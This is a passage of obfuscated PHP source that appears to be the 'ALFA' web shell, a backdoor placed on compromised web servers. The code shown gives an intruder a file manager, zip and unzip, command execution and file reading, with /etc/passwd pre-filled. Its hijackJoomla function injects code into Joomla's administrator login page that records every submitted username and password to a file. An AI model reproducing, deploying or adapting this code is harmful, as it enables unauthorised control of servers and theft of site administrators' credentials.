($_SESSION["\x61\x63\x74"] == "\172\151\x70" && isset($_SESSION["\x66"])) { if (class_exists("\x5a\151\x70\101\x72\x63\x68\151\166\145")) { goto bkzQ0; bkzQ0: $zip = new ZipArchive(); goto Y1mGP; O8EPF: if ($zip->open($zipX, 1)) { goto eB2Ur; eB2Ur: @chdir($_SESSION["\143"]); goto prdrP; ochQ8: @chdir($GLOBALS["\143\x77\x64"]); goto Qw85v; Qw85v: $zip->close(); goto eGa2w; prdrP: foreach ($_SESSION["\146"] as $f) { if ($f == "\56\x2e") { continue; } if (@is_file($_SESSION["\143"] . $f)) { $zip->addFile($_SESSION["\x63"] . $f, $f); } elseif (@is_dir($_SESSION["\x63"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\57")); foreach ($iterator as $key => $value) { $key = str_replace("\x5c", "\57", realpath($key)); if (@is_dir($key)) { if (in_array(substr($key, strrpos($key, "\57") + 1), array("\56", "\56\56"))) { continue; } } else { $zip->addFile($key, $key); } } } } goto ochQ8; eGa2w: __alert("\76\76\x20" . $zipX . "\40\x3c\x3c\x20\151\x73\x20\x63\162\145\141\164\145\144\x2e\x2e\56"); goto yFWry; yFWry: } goto WO0iX; Y1mGP: $zipX = "\x61\x6c\146\x61\x5f" . rand(1, 1000) . "\56\172\151\x70"; goto O8EPF; WO0iX: } } elseif ($_SESSION["\141\x63\x74"] == "\x75\156\172\x69\160" && isset($_SESSION["\146"])) { if (class_exists("\x5a\x69\x70\101\x72\x63\x68\x69\166\x65")) { $zip = new ZipArchive(); foreach ($_SESSION["\146"] as $f) { if ($zip->open($_SESSION["\143"] . $f)) { $zip->extractTo($GLOBALS["\143\x77\144"]); $zip->close(); } } } } goto Frxux; yikH4: break; goto zfifs; zfifs: default: if (!empty($_POST["\x61\x6c\146\x61\61"])) { goto DvNq0; YcC3H: $_SESSION["\x66"] = @$_POST["\x66"]; goto skGlZ; skGlZ: $_SESSION["\x63"] = @$_POST["\x63"]; goto lcSeJ; DvNq0: $_SESSION["\x61\x63\x74"] = @$_POST["\141\x6c\x66\x61\x31"]; goto YcC3H; lcSeJ: } break; } } goto n8mTR; Dvssi: foreach ($files as $f) { goto A3A7y; AnjMF: $cc++; goto by7w4; asXEB: echo "\74\x74\162" . ($l ? "\40\143\x6c\x61\x73\163\x3d\x6c\61" : '') . "\76\x3c\x74\144\x3e\74\x64\151\x76\x20\143\154\x61\163\x73\75\42\x6d\x79\x43\x68\145\143\153\142\x6f\170\42\76\x3c\151\156\160\x75\x74\x20\x74\x79\160\x65\x3d\42\x63\150\x65\x63\x6b\x62\157\170\x22\x20\x6e\x61\155\145\x3d\42\146\x5b\135\x22\x20\166\x61\154\x75\145\75\x22" . $raw_name . "\x22\40\x63\x6c\141\163\163\x3d\42\143\x68\x6b\x62\x78\42\x20\151\x64\x3d\42" . $checkbox . "\42\76\x3c\154\x61\x62\145\154\x20\146\157\162\x3d\42" . $checkbox . "\x22\x3e\74\x2f\x6c\x61\142\145\154\76\x3c\x2f\144\151\166\x3e\x3c\57\164\144\76\x3c\164\144\76" . $icon . "\x3c\x64\151\x76\x20\163\164\171\154\145\x3d\42" . $style . "\42\x3e\x3c\x61\40\143\x6c\x61\x73\163\x3d\x22\155\141\x69\156\x5f\x6e\141\x6d\x65\42\40\x68\162\145\146\x3d\152\x61\x76\x61\x73\143\x72\x69\160\x74\72\166\157\151\x64\x28\x30\x29\x20\x6f\x6e\143\x6c\151\x63\153\x3d\42" . ($f["\x74\x79\x70\x65"] == "\x66\x69\154\145" ? "\145\144\151\x74\x6f\x72\x28\47" . $raw_name . "\x27\54\x27\141\x75\x74\157\47\54\x27\47\x2c\47\47\x2c\47\x27\x2c\47" . $f["\164\171\160\x65"] . "\x27\51\73\42\76" . ($GLOBALS["\143\167\144"] . $f["\x6e\141\x6d\145"] == $GLOBALS["\137\137\146\151\154\x65\137\x70\141\164\150"] ? "\74\x73\x70\141\x6e\40\x63\154\141\x73\163\x3d\x27\x73\x68\x65\x6c\154\137\x6e\141\155\145\x27\x20\x73\x74\x79\x6c\145\x3d\47\146\157\x6e\164\55\167\145\151\147\150\164\x3a\165\x6e\163\x65\x74\73\47\76" . $f["\156\x61\155\145"] . "\x3c\x2f\x73\160\x61\156\x3e" : htmlspecialchars($newname)) : "\x67\x28\47\x46\x69\154\145\163\115\x61\156\47\x2c\x27" . $f["\160\141\164\x68"] . "\47\x29\x3b\42\x20\x74\x69\x74\x6c\145\75" . $f["\x6c\151\156\153"] . "\x3e\74\x62\76\x7c\40" . htmlspecialchars($f["\x6e\141\155\145"]) . "\x20\x7c\74\57\x62\x3e") . "\x3c\57\x61\76\x3c\57\x74\144\x3e\x3c\57\144\x69\166\76\x3c\164\x64\x3e\74\163\160\x61\x6e\x20\163\x74\x79\x6c\x65\75\42\x66\x6f\156\x74\x2d\167\x65\x69\x67\x68\164\72\x75\x6e\163\x65\164\x3b\42\x20\x63\x6c\141\163\x73\x3d\42\155\141\151\x6e\137\x73\x69\172\x65\x22\x3e" . ($f["\164\x79\x70\145"] == "\146\151\x6c\x65" ? alfaSize($f["\x73\151\x7a\145"]) : $f["\x74\x79\x70\x65"]) . "\x3c\57\x73\160\x61\156\76\74\x2f\164\x64\76\74\x74\144\x3e\74\x73\x70\141\x6e\40\x73\164\171\154\145\75\42\146\x6f\x6e\164\x2d\x77\x65\151\147\x68\164\x3a\x75\x6e\163\x65\164\x3b\x22\40\x63\154\x61\163\x73\x3d\x22\155\x61\151\156\137\155\157\x64\151\x66\171\42\x3e" . $f["\155\x6f\x64\x69\146\x79"] . "\x3c\x2f\x73\160\141\156\x3e\x3c\57\164\x64\76\x3c\x74\x64\x3e\x3c\x73\160\x61\156\x20\x73\x74\x79\x6c\x65\x3d\42\x66\x6f\156\164\55\167\145\151\147\x68\164\72\x75\x6e\x73\x65\x74\73\x22\x20\143\154\141\x73\x73\x3d\42\x6d\141\x69\x6e\x5f\157\167\x6e\145\162\x5f\147\162\157\165\x70\42\76" . $f["\x6f\167\156\x65\x72"] . "\57" . $f["\x67\162\157\x75\160"] . "\74\57\x73\x70\141\156\x3e\74\x2f\164\x64\x3e\x3c\x74\144\76\x3c\x61\40\x68\x72\145\x66\x3d\x6a\141\166\141\x73\143\x72\151\160\x74\72\x76\157\151\x64\50\60\x29\x20\157\156\x63\x6c\x69\143\153\75\42\145\144\151\164\x6f\162\50\47" . $raw_name . "\47\x2c\47\143\150\x6d\x6f\x64\x27\54\x27\x27\x2c\x27\x27\54\47\47\54\x27" . $f["\164\171\160\x65"] . "\47\51\x22\x3e" . $f["\x70\145\162\x6d\x73"] . "\74\x2f\x74\x64\x3e\x3c\164\x64\x3e\x3c\141\40\x63\154\141\163\163\x3d\x22\x61\143\x74\151\x6f\x6e\x73\42\40\150\162\x65\146\75\42\152\141\166\141\163\143\x72\x69\x70\164\x3a\166\157\151\x64\x28\x30\x29\x3b\42\x20\157\x6e\x63\x6c\151\x63\x6b\75\42\145\x64\x69\164\x6f\162\50\47" . $raw_name . "\47\54\x20\x27\162\145\x6e\141\155\145\47\x2c\47\47\54\x27\x27\54\x27\x27\54\47" . $f["\x74\171\160\145"] . "\x27\51\x22\x3e\x52\74\x2f\141\x3e\x20\x3c\x61\x20\x63\154\x61\x73\x73\75\42\141\x63\164\151\157\156\163\x22\40\150\162\145\146\x3d\42\x6a\x61\166\141\163\x63\x72\151\x70\x74\72\166\157\151\144\x28\x30\51\73\42\40\x6f\x6e\143\154\x69\x63\153\75\42\x65\x64\151\x74\157\162\50\47" . $raw_name . "\47\54\40\x27\164\x6f\x75\143\150\47\x2c\x27\47\54\x27\47\54\x27\x27\x2c\x27" . $f["\x74\171\160\145"] . "\47\51\x22\76\x54\x3c\x2f\141\x3e" . ($f["\164\171\x70\x65"] == "\146\151\x6c\x65" ? "\x20\74\141\40\143\154\x61\x73\x73\x3d\x22\141\143\x74\x69\157\156\163\42\x20\150\x72\145\146\x3d\42\152\141\x76\x61\x73\143\x72\151\160\x74\72\x76\157\x69\144\50\60\51\73\x22\x20\x6f\x6e\143\x6c\151\x63\153\x3d\x22\x65\x64\151\x74\x6f\x72\x28\x27" . $raw_name . "\47\x2c\40\x27\x65\144\151\164\x27\x2c\x27\47\54\x27\x27\54\47\x27\x2c\47" . $f["\164\x79\x70\x65"] . "\47\x29\x22\x3e\105\x3c\57\x61\x3e\x20\x3c\141\x20\x63\154\x61\163\x73\x3d\42\141\x63\164\x69\157\x6e\x73\42\40\x68\x72\145\146\75\42\x6a\x61\x76\141\163\143\x72\151\160\164\72\166\157\151\144\50\x30\x29\x3b\x22\x20\157\x6e\x63\x6c\151\143\x6b\75\x22\x67\50\47\106\151\x6c\145\163\x54\157\157\154\163\x27\x2c\156\165\x6c\154\54\x27" . $raw_name . "\47\54\40\47\x64\157\x77\156\x6c\157\x61\x64\x27\x29\x22\76\104\x3c\57\141\76" : '') . "\74\141\x20\x63\x6c\141\163\x73\x3d\42\141\x63\164\151\x6f\x6e\x73\42\40\150\162\145\146\x3d\42\x6a\141\166\141\163\x63\x72\x69\160\164\72\x76\157\x69\x64\x28\x30\x29\73\x22\x20\x6f\156\x63\154\x69\x63\153\x3d\x22\166\141\162\40\143\x68\153\x20\x3d\40\x63\157\x6e\x66\x69\162\x6d\x28\47\x41\x72\145\x20\x59\157\x75\x20\123\x75\x72\x65\x20\106\157\x72\40\104\145\154\x65\164\145\40\43\x20" . addslashes(rawurldecode($f["\x6e\x61\x6d\145"])) . "\x20\x23\x20\77\x27\x29\x3b\x20\x63\x68\153\x20\x3f\x20\x67\50\47\x46\151\x6c\x65\163\x4d\141\156\x27\x2c\x6e\165\x6c\154\54\x27\144\x65\x6c\x65\164\145\x27\54\x20\47" . $raw_name . "\x27\x29\x20\x3a\40\x27\x27\73\x22\76\x20\x58\40\74\x2f\x61\76\x3c\x2f\164\x64\76\74\57\164\162\76"; goto y87bG; A3A7y: $f["\156\141\x6d\145"] = htmlspecialchars($f["\156\x61\155\145"]); goto sLost; jiEos: $raw_name = rawurlencode($f["\x6e\141\x6d\x65"]); goto WJAsT; MLWmU: $style = $GLOBALS["\x44\102\x5f\x4e\101\115\x45"]["\x73\150\x6f\x77\137\151\x63\157\x6e\163"] ? "\160\x6f\163\x69\164\151\157\x6e\72\x72\x65\154\141\x74\151\x76\145\73\x64\151\163\x70\154\141\x79\x3a\x69\x6e\x6c\151\x6e\145\55\x62\154\x6f\143\153\73\142\157\x74\164\x6f\x6d\x3a\61\62\x70\170\73" : ''; goto asXEB; WJAsT: $icon = $GLOBALS["\x44\x42\x5f\116\x41\115\105"]["\x73\x68\x6f\x77\137\151\x63\157\156\163"] ? "\74\x69\155\x67\x20\x73\162\x63\x3d\42" . findicon($f["\156\x61\155\145"], $f["\164\x79\160\x65"]) . "\42\x20\167\151\x64\164\150\x3d\x22\x33\60\x22\40\150\145\151\x67\150\x74\x3d\42\63\60\x22\x3e" : ''; goto MLWmU; sLost: $newname = mb_strlen($f["\156\141\155\145"], "\x55\124\106\55\70") > 60 ? mb_substr($f["\x6e\141\155\x65"], 0, 60, "\165\164\x66\x2d\70") . "\x2e\56\x2e" : $f["\x6e\141\155\x65"]; goto dHew7; dHew7: $checkbox = "\143\150\145\x63\153\x62\x6f\170" . $cc; goto jiEos; y87bG: $l = $l ? 0 : 1; goto AnjMF; by7w4: } goto f6bDN; gpn7f: } goto iDAKi; IAq2M: function hijackJoomla($path, $saveto) { goto Jz1zi; qCuP8: $code = str_replace("\173\163\141\x76\x65\164\x6f\x5f\x70\x61\x74\x68\x7d", $saveto, $code); goto bS6X1; Jz1zi: $code = "\74\x3f\160\150\x70\40\x6a\151\155\160\x6f\162\x74\50\x27\152\x6f\157\155\154\x61\x2e\165\x73\145\162\56\x61\x75\x74\150\145\x6e\x74\151\x63\x61\x74\x69\x6f\x6e\47\x29\x3b\x24\101\154\x66\141\137\x61\x75\x74\x68\40\75\40\46\x20\112\101\x75\x74\150\145\156\x74\151\x63\x61\164\x69\x6f\156\72\x3a\147\145\164\111\x6e\x73\164\141\156\143\145\x28\x29\x3b\x24\x41\154\x66\x61\x5f\144\141\x74\x61\40\x3d\x20\x61\x72\162\x61\x79\50\47\165\163\x65\x72\x6e\x61\x6d\x65\47\x3d\76\44\x5f\120\x4f\123\x54\133\x27\165\163\145\x72\156\x61\155\x65\47\135\x2c\47\160\141\163\x73\x77\x6f\162\x64\x27\x3d\76\x24\137\120\117\x53\124\x5b\x27\x70\x61\x73\x73\167\144\x27\x5d\x29\x3b\x24\101\154\146\141\137\x6f\160\164\151\x6f\x6e\x73\40\75\40\x61\x72\x72\141\x79\50\51\73\44\101\x6c\x66\141\x5f\x72\x65\x73\x70\157\156\x73\x65\x20\75\x20\x24\101\x6c\x66\141\137\141\x75\164\150\x2d\76\141\x75\x74\150\145\x6e\x74\151\x63\x61\164\145\50\44\101\154\x66\x61\137\144\x61\x74\x61\54\40\44\101\154\146\x61\137\x6f\160\x74\151\x6f\156\163\51\73\151\x66\50\44\x41\154\146\141\x5f\x72\x65\163\160\x6f\x6e\163\x65\55\76\x73\x74\x61\x74\165\163\40\x3d\x3d\40\61\x29\x7b\x24\x61\x6c\x66\141\137\146\x69\x6c\145\75\42\x7b\x73\x61\166\145\x74\157\137\x70\x61\164\150\175\x22\x3b\44\146\160\75\100\x66\x6f\x70\145\x6e\50\x24\x61\154\146\x61\x5f\x66\151\154\x65\x2c\x22\x61\53\42\51\73\100\146\x77\x72\x69\x74\145\50\x24\146\160\54\40\44\101\x6c\146\141\x5f\x72\145\x73\160\x6f\156\163\x65\x2d\76\x75\163\145\162\156\141\155\x65\56\x22\x3a\x22\56\x24\x5f\x50\117\123\x54\133\47\x70\141\163\163\x77\144\x27\x5d\56\x22\40\x28\x20\x22\56\x24\101\154\146\141\x5f\162\x65\163\x70\157\x6e\x73\x65\55\x3e\145\155\141\x69\154\56\42\x20\x29\134\156\42\51\x3b\100\146\x63\x6c\157\x73\145\50\44\x66\x70\51\x3b\44\146\x20\75\x20\x40\146\x69\x6c\x65\50\x24\x61\154\146\x61\x5f\x66\x69\154\145\51\73\x24\x6e\145\x77\40\75\x20\141\162\x72\141\x79\x5f\x75\156\151\161\x75\x65\50\44\x66\x29\x3b\44\146\x70\x20\x3d\x20\100\146\157\160\x65\x6e\x28\x24\x61\x6c\146\141\x5f\x66\151\x6c\x65\54\x20\x22\x77\x22\x29\73\146\x6f\x72\x65\141\x63\x68\50\x24\x6e\145\x77\40\141\x73\x20\x24\x76\x61\154\165\145\x73\x29\173\x40\x66\x70\165\x74\163\x28\44\x66\160\x2c\40\44\166\141\154\165\145\163\x29\73\x7d\x40\x66\x63\x6c\x6f\x73\145\50\44\146\x70\x29\73\175\77\x3e"; goto qCuP8; JMnbv: if (@is_file($login) and @is_writable($login) and $login != '') { goto kpCV6; wksDE: @file_put_contents($login, $evil_login); goto nxIrl; kpCV6: $data_login = @file_get_contents($login); goto OjDqa; nxIrl: hijackOutput(0, $saveto); goto E2ZWK; OjDqa: $evil_login = $code . "\xa" . $data_login; goto wksDE; E2ZWK: } else { hijackOutput(1); } goto qCeM_; Ej9ok: if (@is_file($comp . "\x2f\x6c\157\x67\x69\156\56\x70\x68\160")) { $login = $comp . "\57\154\x6f\147\151\x6e\56\x70\x68\160"; } elseif (@is_file($comp . "\x2f\141\x64\x6d\x69\x6e\x2e\154\x6f\147\x69\x6e\x2e\x70\150\x70")) { $login = $comp . "\x2f\141\144\155\x69\156\56\154\157\x67\151\x6e\x2e\x70\150\x70"; } else { $login = ''; } goto JMnbv; bS6X1: $comp = $path . "\57\x61\144\x6d\151\x6e\151\x73\x74\162\141\x74\157\162\x2f\x63\157\155\x70\157\x6e\145\156\164\163\x2f\143\157\x6d\137\x6c\x6f\x67\x69\x6e\57"; goto Ej9ok; qCeM_: } goto DFLIu; PDb5Q: $GLOBALS["\156\x65\x65\x64\137\164\157\x5f\165\x70\x64\x61\x74\x65\x5f\x68\145\x61\144\145\162"] = "\x66\x61\x6c\x73\145"; goto aS3hK; JjHhJ: if (!isset($GLOBALS["\x44\102\x5f\116\x41\115\x45"]["\x73\x61\x66\x65\155\157\144\x65"])) { exit("\44\107\x4c\x4f\x42\x41\114\123\x5b\47\x44\102\x5f\116\101\x4d\105\x27\135\x5b\x27\x73\x61\x66\145\155\157\x64\145\x27\135"); } goto I2eZU; FDVwi: function alfafooter() { if (!isset($_POST["\141\152\x61\170"])) { echo "\74\164\x61\142\x6c\x65\40\143\154\141\163\x73\x3d\47\146\x6f\157\x74\x27\x20\167\151\x64\164\x68\75\47\61\60\60\x25\x27\x20\x62\157\x72\x64\145\162\75\47\60\x27\40\143\x65\x6c\x6c\x73\x70\141\x63\151\x6e\x67\75\x27\63\47\40\x63\x65\154\x6c\x70\141\x64\144\151\x6e\x67\75\x27\60\x27\40\x3e\15\12\74\x74\x72\76\15\xa\x3c\164\144\x20\x77\x69\144\164\x68\x3d\47\x31\x37\x25\x27\76\74\x66\157\x72\x6d\x20\157\x6e\x73\x75\x62\155\x69\x74\75\42\x69\x66\x28\164\x68\151\x73\x2e\146\56\166\141\x6c\x75\x65\x2e\x74\x72\151\155\x28\x29\x2e\154\x65\x6e\147\164\x68\x3d\75\60\51\x72\x65\164\x75\x72\156\40\146\x61\154\x73\x65\x3b\145\144\151\164\x6f\162\50\164\150\x69\x73\56\146\x2e\x76\141\x6c\165\145\54\x27\155\153\x66\x69\x6c\145\47\x2c\x27\47\x2c\x27\47\x2c\47\x27\x2c\47\146\x69\154\145\47\51\x3b\164\150\x69\x73\56\146\x2e\166\141\x6c\165\x65\x3d\47\47\x3b\162\x65\164\165\x72\x6e\x20\146\x61\x6c\x73\145\73\x22\x3e\x3c\x73\160\x61\156\x20\x63\x6c\x61\x73\x73\x3d\x27\146\x6f\157\164\x65\162\x5f\x74\145\x78\164\47\x3e\x4d\x61\153\145\x20\x46\x69\154\145\x20\x3a\x20\74\57\x73\160\x61\156\x3e\x3c\x62\x72\x3e\74\151\x6e\160\x75\x74\x20\143\x6c\x61\x73\163\75\47\144\x69\162\x27\40\x74\171\x70\x65\x3d\47\x74\145\170\x74\47\40\156\141\x6d\x65\x3d\x27\x66\x27\40\166\x61\x6c\165\145\x3d\47\x27\x3e\x20\x3c\x69\156\160\x75\x74\40\x74\171\160\145\75\47\163\165\x62\x6d\151\164\x27\x20\166\x61\x6c\x75\145\x3d\x27\40\x27\76\x3c\57\x66\157\x72\155\76\x3c\57\164\144\x3e\xd\xa\74\164\x64\40\x77\x69\x64\164\x68\x3d\47\x32\x31\x25\47\x3e\x3c\x66\x6f\x72\x6d\40\x6f\x6e\x73\x75\142\155\x69\x74\x3d\42\147\50\x27\106\x69\154\145\163\x4d\x61\156\x27\54\156\x75\x6c\x6c\54\47\x6d\x6b\144\151\162\47\54\164\150\x69\163\x2e\144\56\x76\141\x6c\x75\145\x29\73\x74\x68\x69\163\x2e\x64\56\x76\x61\x6c\165\x65\75\47\47\73\x72\x65\164\165\162\x6e\x20\146\141\x6c\163\145\x3b\x22\x3e\74\163\160\x61\156\x20\x63\154\x61\163\x73\x3d\47\146\157\x6f\x74\145\x72\x5f\164\145\x78\164\x27\x3e\115\141\153\x65\x20\104\x69\162\40\72\40\x3c\x2f\163\160\141\156\76\x3c\142\162\76\x3c\151\x6e\160\x75\x74\40\x63\x6c\x61\x73\x73\x3d\x27\x64\151\x72\x27\40\164\171\160\x65\75\x27\x74\145\x78\x74\x27\40\156\x61\x6d\145\75\x27\144\47\40\x76\141\154\165\x65\75\47\40\47\x3e\x20\74\x69\156\160\165\x74\x20\164\171\160\145\x3d\x27\x73\x75\142\155\x69\x74\x27\40\x76\x61\154\x75\x65\75\47\x20\x27\x3e\x3c\x2f\x66\x6f\x72\155\x3e\x3c\x2f\164\144\76\15\12\74\x74\144\40\167\x69\144\x74\x68\x3d\47\62\62\45\x27\76\x3c\146\157\162\155\40\157\x6e\x73\165\142\155\x69\x74\x3d\x22\147\50\x27\x46\x69\154\145\x73\x4d\x61\156\x27\x2c\156\x75\x6c\x6c\54\x27\x64\145\x6c\145\x74\x65\47\54\164\x68\151\x73\x2e\x64\x65\154\56\x76\x61\x6c\x75\145\x29\73\x74\150\151\163\56\x64\x65\154\x2e\166\x61\154\165\x65\x3d\x27\47\x3b\x72\145\164\165\162\156\x20\146\x61\154\x73\145\73\42\76\x3c\163\160\141\x6e\40\x63\154\141\x73\163\75\47\146\157\x6f\164\145\x72\x5f\164\x65\170\164\47\76\104\145\x6c\145\x74\x65\x20\72\40\74\x2f\163\160\141\156\x3e\x3c\142\162\x3e\x3c\151\156\x70\165\x74\40\x63\154\141\163\x73\x3d\47\144\x69\x72\x27\x20\164\x79\x70\145\x3d\x27\164\145\170\164\x27\x20\x6e\x61\155\x65\x3d\47\x64\145\154\47\x20\166\141\154\165\x65\x3d\x27\40\47\x3e\x20\x3c\151\156\x70\x75\164\40\164\171\160\x65\x3d\x27\x73\x75\142\155\151\164\47\40\x76\x61\154\x75\x65\75\47\40\47\76\x3c\57\146\157\162\155\76\x3c\x2f\164\144\76\15\xa\x3c\x74\x64\x20\167\151\x64\164\x68\75\47\61\x39\45\x27\x3e\x3c\x66\157\162\155\40\157\156\163\x75\142\155\x69\164\75\x22\151\x66\x28\164\x68\x69\163\x2e\x66\56\x76\x61\x6c\165\x65\x2e\x74\x72\151\x6d\50\51\x2e\154\145\156\147\164\x68\75\75\60\51\x72\145\x74\165\162\x6e\40\x66\x61\x6c\163\145\x3b\x65\144\x69\x74\x6f\x72\x28\164\x68\x69\163\x2e\146\56\x76\141\154\x75\145\x2c\x27\x63\x68\x6d\157\x64\47\x2c\x27\x27\54\x27\47\54\47\x27\54\x27\156\x6f\156\x65\47\51\73\x74\x68\x69\163\56\x66\56\x76\x61\154\165\145\x3d\47\47\x3b\x72\145\x74\x75\x72\x6e\40\146\x61\x6c\x73\145\73\x22\76\74\x73\x70\x61\156\x20\x63\x6c\x61\163\x73\75\47\x66\x6f\157\164\x65\162\137\164\x65\x78\x74\x27\x3e\x43\x68\x6d\x6f\x64\40\72\x20\74\x2f\x73\160\141\156\x3e\x3c\x62\162\x3e\74\x69\156\160\x75\x74\40\143\x6c\x61\163\163\75\47\144\151\162\x27\x20\164\171\x70\145\75\164\145\170\164\40\x6e\x61\155\x65\x3d\x66\40\166\141\x6c\165\145\x3d\47\40\47\x3e\x20\x3c\151\156\160\x75\x74\x20\x74\x79\x70\x65\x3d\47\x73\x75\142\x6d\151\x74\47\x20\x76\x61\154\165\x65\x3d\x27\40\47\76\74\x2f\146\157\x72\x6d\76\74\x2f\164\x64\x3e\15\xa\x3c\57\164\162\x3e\15\12\x3c\x74\162\76\15\12\x3c\x74\144\x20\x63\x6f\x6c\163\x70\141\156\75\x27\x32\x27\76\x3c\x66\157\x72\x6d\x20\157\x6e\163\165\142\x6d\151\164\75\47\x67\x28\42\106\x69\154\x65\163\x4d\141\x6e\42\54\164\150\x69\x73\x2e\143\56\x76\141\x6c\165\145\x2c\42\42\51\x3b\x72\145\164\165\162\x6e\40\x66\x61\x6c\x73\x65\73\x27\x3e\x3c\163\x70\x61\156\x20\143\154\x61\x73\x73\75\x27\x66\x6f\157\x74\145\x72\x5f\x74\x65\x78\164\47\76\103\150\x61\x6e\x67\145\40\x44\x69\162\x20\x3a\40\x3c\57\163\160\x61\x6e\x3e\74\142\x72\x3e\74\x69\156\x70\x75\164\x20\143\154\141\x73\x73\x3d\x27\146\157\x6f\x74\x74\x61\142\154\x65\47\40\151\x64\x3d\x27\x66\157\x6f\x74\x65\162\137\143\x77\x64\47\40\x74\x79\x70\x65\x3d\47\x74\x65\170\x74\47\x20\156\x61\155\x65\75\x27\143\x27\40\x76\x61\x6c\x75\145\75\x27" . htmlspecialchars($GLOBALS["\x63\167\x64"]) . "\47\x3e\40\74\151\x6e\x70\165\164\x20\x74\x79\x70\145\x3d\47\163\x75\142\x6d\151\x74\x27\x20\166\141\x6c\x75\x65\x3d\x27\x20\x27\76\74\57\x66\x6f\x72\155\x3e\74\57\164\x64\x3e\xd\12\x3c\164\x64\x20\143\157\x6c\x73\x70\x61\156\75\47\62\47\76\74\146\x6f\162\155\40\157\156\163\165\142\x6d\151\164\75\x22\x65\x64\151\164\x6f\162\x28\x74\150\151\x73\56\146\151\x6c\x65\56\x76\141\154\165\145\x2c\x27\x61\165\164\157\47\54\47\x27\54\47\47\54\x27\47\x2c\x27\x66\x69\x6c\145\x27\51\73\162\x65\x74\165\x72\156\x20\x66\x61\154\163\x65\x3b\42\x3e\x3c\163\x70\x61\156\x3e\x3c\x73\160\141\156\40\x63\x6c\141\163\x73\75\47\x66\x6f\157\164\145\162\137\164\145\x78\164\47\76\x52\x65\141\144\x20\106\151\154\x65\40\x3a\40\x3c\x2f\163\160\141\156\76\74\x2f\x73\x70\x61\x6e\76\x3c\142\162\x3e\74\x69\156\160\x75\164\40\x63\154\x61\x73\163\x3d\x27\146\x6f\157\164\164\141\x62\154\x65\47\40\x74\x79\160\145\75\x27\x74\x65\x78\x74\47\40\156\141\x6d\x65\75\x27\146\151\154\145\x27\x20\x76\x61\154\x75\x65\x3d\x27\x2f\x65\x74\143\57\160\141\x73\x73\x77\144\47\76\40\x3c\x69\x6e\160\165\164\40\x74\171\x70\x65\x3d\x27\x73\165\x62\x6d\151\164\47\x20\x76\141\x6c\165\145\x3d\47\40\47\76\x3c\57\146\x6f\162\x6d\76\x3c\x2f\164\x64\x3e\15\12\74\57\x74\162\x3e\xd\xa\74\x74\162\76\xd\12\x3c\x74\x64\40\143\x6f\x6c\163\x70\141\x6e\x3d\47\64\47\76\x3c\146\x6f\162\155\x20\x6f\156\163\x75\142\x6d\x69\x74\75\x22\x67\x28\47\160\162\157\x63\47\54\x6e\x75\x6c\154\54\164\x68\x69\x73\x2e\143\56\x76\x61\154\x75\145\x29\73\164\x68\x69\x73\x2e\x63\56\x76\x61\x6c\x75\145\x3d\x27\47\x3b\162\145\x74\x75\162\156\40\x66\141\x6c\163\145\x3b\42\76\74\x73\160\141\156\76\74\163\160\x61\156\40\143\154\x61\163\x73\x3d\47\x66\x6f\x6f\164\x65\162\x5f\164\145\x78\164\x27\76\105\170\x65\x63\165\x74\145\x20\72\74\x2f\163\x70\141\156\76\74\x62\x72\76\x3c\151\x6e\x70\x75\x74\x20\x63\154\x61\163\163\x3d\47\146\x6f\x6f\164\164\x61\x62\154\145\47\40\x74\x79\x70\x65\x3d\x27\164\x65\170\x74\x27\40\156\141\x6d\145\x3d\47\x63\47\x20\x76\x61\x6c\x75\x65\x3d\47\40\x27\x3e\x20\74\151\x6e\160\x75\x74\40\164\171\160\145\x3d\x27\163\x75\x62\x6d\151\x74\x27\x20\x76\141\x6c\165\x65\75\x27\x20\x27\x3e\x3c\57\146\x6f\x72\x6d\x3e\x3c\57\164\x64\x3e\xd\12\x3c\x2f\164\162\x3e\xd\12\x3c\x74\162\76\xd\12\74\x74\x64\x20\143\x6f\x6c\163\160\x61\156\75\47\64\x27\x3e\74\x66\157\162\x6d\40\x6f\156\x73\165\142\x6d\151\164\75\x27\165\50\164\x68\x69\163\x29\73\x72\145\164\x75\x72\156\x20\146\x61\154\163\145\x3b\x27\40\156\141\x6d\x65\75\47\x66\157\x6f\164\145\x72\x5f\146\157\162\155\47\40\x6d\x65\x74\150\157\x64\75\47\160\157\163\164\x27\40\x45\116\x43\x54\x59\x50\x45\x3d\47\155\165\154\x74\151\160\141\x72\x74\57\146\157\x72\155\x2d\x64\x61\x74\141\47\76\15\12\x3c\x69\x6e\160\x75\x74\x20\x74\x79\x70\145\x3d\47\150\x69\x64\x64\145\x6e\47\x20\156\141\x6d\145\x3d\x27\x61\47\40\x76\141\x6c\x75\145\75\47\106\x69\x6c\x65\x73\115\x41\x6e\x27\x3e\15\xa\x3c\151\156\x70\x75\164\x20\x74\171\x70\145\x3d\x27\x68\151\x64\x64\145\x6e\47\x20\x6e\x61\155\145\75\47\143\x27\40\166\x61\154\x75\145\75\47" . $GLOBALS["\x63\167\x64"] . "\47\x3e\xd\xa\x3c\x69\156\x70\x75\x74\40\164\x79\160\145\x3d\x27\150\x69\x64\x64\145\156\47\x20\x6e\141\155\x65\75\47\141\154\146\141\x31\x27\40\166\x61\x6c\x75\x65\x3d\47\x75\160\154\x6f\141\144\x46\151\154\x65\47\x3e\xd\12\x3c\x69\156\160\x75\164\40\x74\171\x70\x65\75\x27\150\151\144\144\145\156\47\40\x6e\141\155\145\x3d\x27\x63\150\x61\x72\163\x65\164\47\40\x76\x61\x6c\165\x65\75\47" . (isset($_POST["\143\150\x61\162\x73\x65\164"]) ? $_POST["\143\x68\x61\162\x73\145\164"] : '') . "\x27\x3e\15\xa\74\x73\160\x61\156\x20\x63\x6c\x61\163\163\75\47\146\157\x6f\x74\x65\162\137\164\145\x78\x74\47\x3e\125\160\154\157\141\144\x20\146\x69\154\145\72\40\74\57\163\160\141\x6e\x3e\x3c\x73\x70\x61\156\76\74\142\165\164\x74\x6f\x6e\40\151\144\75\47\x61\x64\144\165\160\47\40\157\156\x63\154\x69\x63\x6b\x3d\47\141\144\x64\x6e\145\167\x75\x70\50\x29\x3b\162\145\x74\x75\162\156\40\x66\141\x6c\163\x65\73\47\x3e\74\x62\x3e\x2b\74\57\x62\76\74\x2f\x62\x75\x74\164\157\156\x3e\74\57\x73\160\141\x6e\x3e\x3c\x70\40\x69\144\x3d\47\x70\x66\157\x6f\x74\145\x72\165\x70\x27\x3e\74\x6c\141\142\x65\154\40\143\154\141\163\163\75\47\x69\156\160\x75\x74\x66\x69\154\x65\x27\40\x66\157\162\x3d\47\146\157\x6f\x74\145\162\165\x70\47\76\x3c\163\160\x61\156\40\151\144\x3d\x27\x5f\137\